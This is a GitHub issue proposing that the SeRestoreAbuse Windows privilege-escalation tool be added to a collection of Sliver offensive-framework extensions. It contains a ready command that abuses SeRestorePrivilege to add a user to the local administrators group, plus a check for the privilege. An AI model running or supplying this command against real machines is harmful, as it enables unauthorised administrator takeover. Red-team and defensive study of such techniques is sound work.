sliverarmory / armory

The Official Sliver Armory
https://sliver.sh/
83 stars 12 forks source link

Adding SeRestoreAbuse to armory list #55

Open RajChowdhury240 opened 5 months ago

RajChowdhury240 commented 5 months ago

the main repo : https://github.com/xct/SeRestoreAbuse

Abuse the SeRestorePrivilege

.\SeRestoreAbuse.exe "cmd /c net localgroup administrators <usernametobeaddedtoadministratorgrouphere> /add"

Validate

whoami /priv
RajChowdhury240 commented 5 months ago

Demo

image

Exploit time

image

Validate the permission got modified or not

image